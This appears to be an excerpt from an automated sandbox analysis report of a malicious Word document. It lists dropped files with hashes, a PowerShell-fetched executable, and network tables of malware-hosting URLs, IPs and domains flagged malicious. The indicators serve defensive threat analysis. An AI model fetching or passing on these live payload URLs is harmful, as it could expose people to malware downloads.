SHA256: 9c2616a49d56606bb4255238d7b3843a58fa3f64376e84a2f611ced275ff8111
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\583402FA.wmf
wmf
MD5: c47203d05da1ab9caa14c8f4eacce8a7
SHA256: cdf15a149368dc07c5f2e862d23afb640155edb7c404fca1f954bc2c1ac37ba1
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3923D0C.wmf
wmf
MD5: 9b61be005486e1474f0e3467462d4456
SHA256: 5a424d39fca19464f45f38f6528124f6172f1034718c1fd3df114fb257ab8f18
1036
powershell.exe
C:\Users\admin\668.exe
html
MD5: 286bd3b8fafd327291ab8e87d61d6602
SHA256: c94c7d112faa5dc8cc9bbad34016d2ad89b151d3b2458840964a53b7c40e0e84
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2096FCE.wmf
wmf
MD5: 8c2971c5752f87d26149aaa4bd1fbfce
SHA256: cb9f2ce8e972cfd0f74bc049b357a949db8d7c84283ffd27180739145012a7fc
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\191180C1.wmf
wmf
MD5: 73f49607820ea70427358ea3a7ff7d8a
SHA256: c5435195784f96a63c79b3d4a6cda6ac40ccf5ff635baaecb06f4d168420df55
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76BA13C0.wmf
wmf
MD5: c9900b5f89cba024b5e43a09b8342349
SHA256: aaece3cb409041e1882fc229f41c710196e2b45491755de37009002f7790489b
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
tlb
MD5: 8107bf0b5d526fe92ecb2aa7e1187d69
SHA256: fb16ab127b476ad108b216292cc50d290ed2f6ab306fe574ed84e935b2881abc
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~$2154c8c11e48bc48c41bb84c9f09931b50e2f73e2facb5b888402a9aae05a3.doc
pgc
MD5: 69a6837bbce1ae0f7a8549245e1a6cd7
SHA256: f20829549d41f58b79c4d716ca7f9c9029b50031de337fba7942305bc713f5ae
688
WINWORD.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
pgc
MD5: ef1786e22564e3ba799a22f288cae1d9
SHA256: 69e20f6dc7b121a2cca100df9437a843ac1609886cc56800ed133183ba2ac889
688
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRDEF5.tmp.cvr
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
5
DNS requests
8
Threats
7

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
1036 powershell.exe GET 200 43.255.154.32:80 http://idealnewhomes.com/seite_3/p3jk6ul0y-aad1w-57768077/ SG
html
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
1036 powershell.exe 104.168.157.96:80 Hostwinds LLC. US suspicious
1036 powershell.exe 145.14.144.24:443 Hostinger International Limited US shared
1036 powershell.exe 145.14.145.210:443 Hostinger International Limited US shared
1036 powershell.exe 145.14.144.244:443 Hostinger International Limited US shared
1036 powershell.exe 43.255.154.32:80 GoDaddy.com, LLC SG malicious

DNS requests

Domain IP Reputation
all.ugmuzik.com 104.168.157.96
suspicious
dns.msftncsi.com 131.107.255.255
whitelisted
awal122182.000webhostapp.com 145.14.144.24
shared
zylokk.000webhostapp.com 145.14.145.210
shared
racingturtlesg07.000webhostapp.com 145.14.144.244
shared
idealnewhomes.com 43.255.154.32
malicious

Threats

PID Process Class Message
–– –– Not Suspicious Traffic ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
1036 powershell.exe Not Suspicious Traffic ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
–– –– Not Suspicious Traffic ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
–– –– Not Suspicious Traffic ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
1036 powershell.exe Not Suspicious Traffic ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
–– –– Not Suspicious Traffic ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
1036 powershell.exe Not Suspicious Traffic ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)

Debug output strings

No debug info.